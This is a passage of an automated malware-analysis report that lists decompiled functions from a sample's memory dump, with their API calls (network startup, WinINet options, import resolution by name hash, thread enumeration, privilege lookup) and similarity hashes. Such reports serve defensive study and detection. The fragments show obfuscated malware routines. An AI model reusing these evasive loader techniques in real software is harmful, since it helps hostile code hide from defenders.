				_t2 = E0009BF50(__eflags, 6, 0xaaf7240); // executed
				_t3 = E00099BA0(_t2, 0x2ae);
				_t5 =  *_t2(_t3 & 0x0000ffff,  &_v408); // executed
				return E000955C0(_t5, 0) & 0x00000001;
			}

0x000ac221
0x000ac230
0x000ac243
0x000ac25a

APIs

WSAStartup.WS2_32(?,?), ref: 000AC243

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction ID: d5895b9e638ac6411623dac02507ec4e805386f91435ba691547b838b3c06b0e
Opcode Fuzzy Hash: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction Fuzzy Hash: 2AE086B2D4031437E92071B57C27FF636484711725F450060FE4C551C3F456662891F6

Uniqueness

Uniqueness Score: -1.00%

Function 000A0390, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A0390(void* __eax) {
				void _v12;
				void* _t4;
				int _t7;
				void* _t15;

				_v12 = 0xa;
				_t4 = E00099D50(0x647400bf);
				E0009BF50(_t15, _t4, E00099D50(0x61c0d6ad));
				_t7 = InternetSetOptionA(0, 0x49,  &_v12, 4); // executed
				return _t7;
			}

0x000a0395
0x000a03a1
0x000a03ba
0x000a03cc
0x000a03d3

APIs

InternetSetOptionA.WININET(00000000,00000049,?,00000004,?,?,?,0009C94D), ref: 000A03CC

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: InternetOption
String ID:
API String ID: 3327645240-0
Opcode ID: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction ID: 1a323cbb603b15f59ad3f8e310fef35c1e3c6bf861833f074b03d76a9f13790f
Opcode Fuzzy Hash: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction Fuzzy Hash: 41E08CE6D812143AEA1062D4BC53FFB355C8B12729F050074FA0DA5283F5A666148AE3

Uniqueness

Uniqueness Score: -1.00%

Function 000A8F40, Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000A8F40(intOrPtr _a4, intOrPtr _a8, signed char _a12, signed char _a16, char _a20) {
				char _t8;
				signed int _t11;
				signed int _t13;
				char _t14;
				void* _t15;

				if(_a8 == 0) {
					L7:
					return _t8;
				}
				_t13 = _a16 & 0x000000ff;
				_t11 = _a12 & 0x000000ff;
				_t14 = 0;
				_t18 = 0;
				if(0 != 0) {
					L5:
					_t18 = _a20;
					if(_a20 != 0) {
						E0009BF50(_t18, 0, 0x7a2bc0);
						_t15 = _t15 + 8;
						Sleep(0x14); // executed
					}
					while(1) {
						L3:
						 *((char*)(_a4 + _t14)) = E0009D620(_t11, _t13);
						_t8 = E00091460(_t18, _t14, 1);
						_t15 = _t15 + 0x10;
						_t14 = _t8;
						if(_t8 == _a8) {
							goto L7;
						}
						if(_t14 == 0) {
							continue;
						}
						goto L5;
					}
					goto L7;
				}
				goto L3;
			}

0x000a8f4a
0x000a8fa5
0x000a8fa5
0x000a8fa5
0x000a8f4c
0x000a8f50
0x000a8f54
0x000a8f56
0x000a8f58
0x000a8f86
0x000a8f86
0x000a8f8a
0x000a8f93
0x000a8f98
0x000a8f9d
0x000a8f9d
0x000a8f60
0x000a8f60
0x000a8f6d
0x000a8f73
0x000a8f78
0x000a8f7e
0x000a8f80
0x00000000
0x00000000
0x000a8f84
0x00000000
0x00000000
0x00000000
0x000a8f84
0x00000000
0x000a8f60
0x00000000

APIs

Sleep.KERNEL32(00000014), ref: 000A8F9D

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction ID: 17ab3fad13c1647c9a5e7415fb4f31298057cfe3b74b0d69370ef050f416eea8
Opcode Fuzzy Hash: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction Fuzzy Hash: F8F02B72D453AE3ECF311AA0AC45FEE7B854B87BA9F194131FC4929283D961895083F1

Uniqueness

Uniqueness Score: -1.00%

Function 0009B570, Relevance: 1.3, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0009B570(void* _a4) {
				void* _t2;
				int _t4;
				void* _t5;

				_t5 = _a4;
				_t8 = _t5;
				if(_t5 != 0) {
					E0009BF50(_t8, 0, 0xb86de55);
					_t4 = HeapFree( *0xb2124, 0, _t5); // executed
					return _t4;
				}
				return _t2;
			}

0x0009b574
0x0009b577
0x0009b579
0x0009b582
0x0009b593
0x00000000
0x0009b593
0x0009b597

APIs

HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0e6dac1c9f28517e7a7f85ec535248eb572c6a1681859f4483bf8789543ff126
Instruction ID: 12d17eef5bec0ac8183a723a808ff7b064c40324a5c7f0ce1e0f05c7f8cd6a9d
Opcode Fuzzy Hash: 0e6dac1c9f28517e7a7f85ec535248eb572c6a1681859f4483bf8789543ff126
Instruction Fuzzy Hash: 9CD01273A8532877DA212A95BD07FDA7B5C8B15FB1F090021FE0C7B251A692791056E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0009D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0009D830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E000A12D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E00099D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E00099D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E00091460(_t205, E00091460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E00091460(0,  ~( *_t143), _v40));
							E00091460(0,  *_t143, _a4);
							E000A8F20( &_v140, E00099D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E000AD680(0, _t91);
									_t176 = _t176 - E000922E0(0, 0, 1);
									E00091460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E000A00A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E00091460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E00099D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E000922E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E00091460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E00097DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E00091460(__eflags, E000922E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E00091460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E00091460(__eflags, _t137, E00099D50(0x3638cbc4));
										E00091460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E00097DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
										_t112 = E00099D50(0x8707952b);
										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E00097DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E00097DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E000955A0(_v28, 0xa);
													_t199 = _t199 + 8;
													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x0009d839
0x0009d83c
0x0009d83e
0x0009d840
0x0009d847
0x0009d852
0x0009d854
0x0009d85b
0x0009d860
0x0009d862
0x0009d865
0x0009d86d
0x0009d873
0x0009d873
0x0009d880
0x0009d894
0x0009d89f
0x0009d8af
0x0009d8b4
0x0009d8bb
0x0009d8be
0x0009d8c4
0x0009d8cc
0x0009d8d0
0x0009d8d2
0x0009d8d5
0x0009d8ea
0x0009d8f0
0x0009d90d
0x0009d912
0x0009d915
0x0009d919
0x0009d91b
0x0009d920
0x0009d92c
0x0009d942
0x0009d944
0x0009d949
0x0009d94c
0x0009d950
0x0009d920
0x0009d954
0x0009d95d
0x0009d962
0x0009d968
0x0009d98d
0x0009d9c4
0x0009d9d0
0x0009d9d8
0x0009d9db
0x0009d9e0
0x0009d9e5
0x0009d9e7
0x0009d9ea
0x0009d9ec
0x0009d9f2
0x0009d9fc
0x0009d9fe
0x0009da06
0x0009da0e
0x0009da11
0x0009da16
0x0009da19
0x0009da1c
0x0009da1e
0x0009da20
0x0009da22
0x0009da24
0x0009da24
0x0009da2c
0x0009da30
0x0009da30
0x0009da45
0x0009da51
0x0009da56
0x0009da5b
0x0009da61
0x0009da65
0x0009da68
0x0009da68
0x0009da30
0x0009da83
0x0009da88
0x0009da9a
0x0009daaa
0x0009dab1
0x0009dabe
0x0009dac8
0x0009dad7
0x0009dae5
0x0009daec
0x0009daf3
0x0009daf6
0x0009db05
0x0009db0c
0x0009db11
0x0009db14
0x0009db16
0x0009db54
0x0009db18
0x0009db1e
0x0009db21
0x0009db23
0x0009db59
0x0009db25
0x0009db25
0x0009db30
0x0009db35
0x0009db3a
0x0009db44
0x0009db47
0x0009db4a
0x0009db4b
0x0009db4b
0x0009db4f
0x0009db4f
0x0009db23
0x0009db70
0x0009db70
0x0009d9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0009d96a
0x0009d973
0x0009d974
0x0009d977
0x0009d97a
0x0009d983
0x0009d983
0x0009d86d
0x0009db72
0x0009db7b

APIs

LoadLibraryA.KERNEL32(?), ref: 0009DB62
GetProcAddress.KERNEL32(00000000,?), ref: 0009DB6A

Strings

l, xrefs: 0009DAC8
d, xrefs: 0009DAB1

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: e2a66a7f29839d7ee876785f66da9d4f7e3b194f6b603531649ba7ce79ef0c6e
Instruction ID: 6eca26b2e0120264f5b23545452b970cb6935aa484fee8db310441e1e39abbb3
Opcode Fuzzy Hash: e2a66a7f29839d7ee876785f66da9d4f7e3b194f6b603531649ba7ce79ef0c6e
Instruction Fuzzy Hash: CB9119B6D402159BDF109FB4AC82AFE7BB4AF16358F090065FC49B7343E6319A14D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 000A69A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A69A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E00099D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E000955C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E000955C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x000a69b2
0x000a69c1
0x000a69ca
0x000a69d9
0x000a69de
0x000a69e3
0x000a6a25
0x000a6a25
0x000a69eb
0x000a69eb
0x000a69ef
0x000a69f0
0x000a69ff
0x000a6a04
0x000a6a11
0x000a6a1d
0x000a6a21
0x00000000
0x00000000
0x000a6a23
0x000a6a21
0x00000000
0x000a6a1d
0x00000000
0x000a69f0
0x000a6a27
0x000a6a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000A69AD
GetCurrentProcessId.KERNEL32 ref: 000A69C4
Thread32First.KERNEL32(00000000,?), ref: 000A69D1
GetLastError.KERNEL32 ref: 000A69F0
Thread32Next.KERNEL32(00000000,?), ref: 000A6A16

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: a5d2626746ee28409eea80e0be773af7b85a77519e888a0b7592b8809c3b9075
Instruction ID: 22550d9d978fb53d7757af38329ec937254bd234e22e72e960605e5c38966302
Opcode Fuzzy Hash: a5d2626746ee28409eea80e0be773af7b85a77519e888a0b7592b8809c3b9075
Instruction Fuzzy Hash: 5801F2B29503046BEB117BF4AC96FFF3A7CEF53315F480130FA04A2123E91A990486B2

Uniqueness

Uniqueness Score: -1.00%

Function 00092340, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00092340(char _a4) {
				signed int _v20;
				struct HDC__* _v24;
				signed int _v28;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				struct HWND__* _t32;
				int _t34;
				struct HWND__* _t35;
				signed int _t36;
				signed int _t39;
				int _t42;
				signed int _t48;
				signed int _t49;
				signed int _t54;
				void* _t56;
				signed int _t58;
				int _t59;

				_t1 =  &_a4; // 0x92f73
				_t56 =  *_t1;
				_t34 = _t56 & 0x00000100;
				RegEnumValueW(_t56, _t34, _t34, _t56 & 0xfffffeff, _t34, _t56 & 0xfffffeff, _t56, _t34);
				_t35 = _t34 * _t56;
				_t39 = 0;
				if(_t35 != _t56) {
					_t36 = _t35 | _t56;
					_t32 = _t36 * _t56;
					_t39 = _t36 * _t32 | _t32;
					_t35 = _t32;
				}
				_t54 = _t39 ^ _t56;
				DestroyWindow(_t35);
				_t58 = _t39 * _t54;
				_v20 = _t58;
				_t3 =  &_a4; // 0x92f73
				_t59 =  *_t3;
				_t42 = _t58 - _t59;
				if(_t59 == 0xaec9ea02 && _t35 != 0xaec9ea02) {
					_t48 = _t42 * _t35;
					_t5 = _t54 - 0x513615fe; // -1362499070
					_t49 = _t48 + _t5;
					_t42 = _t48 + 0xaec9ea02;
					_v24 = _t49;
					_t28 = _t54 * _t49;
					_v28 = _t28;
					_t29 = _t28 + 0xc9;
					_t30 = _t29 * _t35;
					_t35 = _t29 * _t35 >> 0x20;
					_v20 = _t30;
				}
				if(_t35 >= _t59 && _t42 != _t59) {
					MoveToEx(_v24, _t59, _t42, _t59);
					return ((_v28 ^ (_t35 + _v20 & 0x000000ff) * 0xffffffe3) << 0x18) + 0x2a000000 >> 0x18;
				}
				return 0;
			}

0x00092349
0x00092349
0x0009234e
0x00092363
0x00092369
0x0009236c
0x00092370
0x00092372
0x00092376
0x0009237e
0x00092381
0x00092381
0x00092385
0x0009238a
0x00092390
0x00092393
0x00092398
0x00092398
0x0009239e
0x000923a6
0x000923b2
0x000923b5
0x000923b5
0x000923bc
0x000923c2
0x000923c5
0x000923c8
0x000923d0
0x000923d2
0x000923d4
0x000923d6
0x000923d6
0x000923e2
0x000923ee
0x00000000
0x00092410
0x00092419

APIs

RegEnumValueW.ADVAPI32(s/,s/,s/,s/,s/,s/,s/,s/,?,00092F73,?,?,?,?,?,0009AE51), ref: 00092363
DestroyWindow.USER32 ref: 0009238A
MoveToEx.GDI32(00000000,s/,00000000,s/), ref: 000923EE

Strings

s/, xrefs: 00092349, 00092398, 0009235B, 0009235C, 0009235D, 0009235E, 0009235F, 00092360, 00092361, 00092362, 00092387, 000923E8, 000923EA

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: DestroyEnumMoveValueWindow
String ID: s/
API String ID: 1329181790-3258355666
Opcode ID: ea71abc9060870624eee78be531de38e292de3fa50a3bda0095037a54bc3101b
Instruction ID: 70ad689ee023e80a6db14eadaef927469d72580a84d77f7cc3ebeba9af05c8b5
Opcode Fuzzy Hash: ea71abc9060870624eee78be531de38e292de3fa50a3bda0095037a54bc3101b
Instruction Fuzzy Hash: CF2129717002396FDB1C8AA98CD65FFBEDDEB88660B05413BF406DB291E5A48D4183E0

Uniqueness

Uniqueness Score: -1.00%

Function 000946E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000946E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x000946e7
0x000946ea
0x000946ed
0x000946f4
0x000946fa
0x000946ff
0x00094709
0x00094711
0x00094713
0x00094715
0x00094718
0x00094720
0x00094725
0x00094781
0x00094784
0x00094786
0x00094791
0x0009479a
0x0009479f
0x000947a1
0x000947a3
0x000947ab
0x00000000
0x00000000
0x0009472c
0x00094731
0x0009473a
0x000947ad
0x000947ad
0x000947b6
0x000947ca
0x000947ca
0x000947cd
0x000947d1
0x000947e2
0x000947e7
0x000947f9
0x000947fc
0x000947fe
0x00094800
0x00094806
0x00094808
0x0009480a
0x00094810
0x0009481d
0x00094838
0x00094838
0x00094810
0x00094844
0x00094844
0x000947b8
0x000947be
0x00000000
0x000947c5
0x000947c5
0x00000000
0x000947c5
0x000947be
0x0009473c
0x00094743
0x00094745
0x0009474d
0x00094845
0x00094753
0x0009475d
0x00094760
0x0009476d
0x00094773
0x0009477c
0x0009477c
0x0009474d
0x00094743

APIs

OffsetRect.USER32 ref: 000946FF
LookupPrivilegeValueW.ADVAPI32(00000000,-000B1D33,?), ref: 00094791
EndDialog.USER32 ref: 000947D1
SetTextColor.GDI32(-025D1D33,-03E11D33), ref: 0009481D

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID:
API String ID: 2289036324-0
Opcode ID: c28254e91cc9728cd500f66602ef27c31b092bbb0b24000b771ab6631e913eb3
Instruction ID: 9ba050ebae513c17508a059913b242c535c4c40c2c5e30d2476a67e724f3c317
Opcode Fuzzy Hash: c28254e91cc9728cd500f66602ef27c31b092bbb0b24000b771ab6631e913eb3
Instruction Fuzzy Hash: EB411833B005285BDF18CE58CCE0ABFB7EAEB95351B568629F8199B741C634AD46C6C0

Uniqueness

Uniqueness Score: -1.00%

Function 000929D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000929D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -711115
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -710243
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -711066
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x000929d7
0x000929df
0x000929e1
0x000929e5
0x000929f0
0x000929f5
0x00092a01
0x00092a17
0x00092a1f
0x00092a2b
0x00092a2b
0x00092a31
0x00092a34
0x00092a37
0x00092a3d
0x00092a41
0x00092a43
0x00092a43
0x00092a4b
0x00092a51
0x00092a53
0x00092a57
0x00092a59
0x00092a5c
0x00092a62
0x00092a6f
0x00092a81

APIs

DeleteDC.GDI32(-000ADD33), ref: 000929E5
SetWindowPos.USER32(-000ADD33,00097BEC,00000191,00097BEC,00097BEC,00097BEC,00000191), ref: 00092A1F
ResetEvent.KERNEL32(-000AD663,?,00097BEC,-000B1FA0,-03E11D33,-000B1D33,?,00099287,-000B1D33,?,000977A1,00000001,?,-000B1D33,?,00096A74), ref: 00092A4B
CreateDIBSection.GDI32(-000AD99A,-000AD99A,-000AD9CB,-000AD663,-000AD9CB,-000AD9CB), ref: 00092A6F

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: 3409eff8cf9416cd87beb010bacdbf8b4ae8af0e4800778182f601db0a6ec57f
Instruction ID: 56f4f18647e72d7b827c133b4484286b29c65badd572b00d73a90061db79f27f
Opcode Fuzzy Hash: 3409eff8cf9416cd87beb010bacdbf8b4ae8af0e4800778182f601db0a6ec57f
Instruction Fuzzy Hash: 4C11EB73B002247FE7248A5ADC49EDBBA5EE7C9710F060226F949DB150D575AF05C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 000ADA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000ADA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E00097200(0xb05f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4);
				}
				SetLastError(0);
				return _t4;
			}

0x000ada3f
0x000ada47
0x000ada4c
0x000ada53
0x000ada53
0x000ada5b
0x000ada66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-000B1D33,?,000991EB,-000B1D33,?,000977A1,00000001), ref: 000ADA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-000B1D33,?,000991EB,-000B1D33,?,000977A1,00000001,?,-000B1D33,?,00096A74), ref: 000ADA4C
CloseHandle.KERNEL32(00000000), ref: 000ADA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-000B1D33,?,000991EB,-000B1D33,?,000977A1,00000001,?,-000B1D33,?,00096A74), ref: 000ADA5B

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: f2e908e6812aa9bcd17f4081954baace572480927d5260a5a849c33e9e80e63c
